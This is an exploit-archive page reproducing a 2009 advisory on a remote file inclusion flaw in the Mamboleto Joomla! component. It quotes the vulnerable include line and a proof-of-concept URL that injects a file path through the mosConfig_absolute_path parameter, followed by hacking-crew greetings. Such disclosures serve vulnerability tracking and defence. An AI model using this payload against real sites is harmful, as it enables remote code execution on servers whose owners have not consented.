Advertisement






Mamboleto Joomla! component Remote File Include Vulneralbility

CVE Category Price Severity
CWE-98 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2010-01-14
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010010166

Below is a copy:

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author: Don Tukulesto ([email protected])
[!] Homepage: http://www.indonesiancoder.com
[!] Date: December 10, 2009
[!] Tune In: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em "legacy mode". 
    Muito mais aprimorado com dois bancos a mais  (Sicredi e Bancoob) e com um novo mdulo de integraão com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ] 

[>] FOR MALINGSIAL


[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg... beg... beg... begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!
[+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.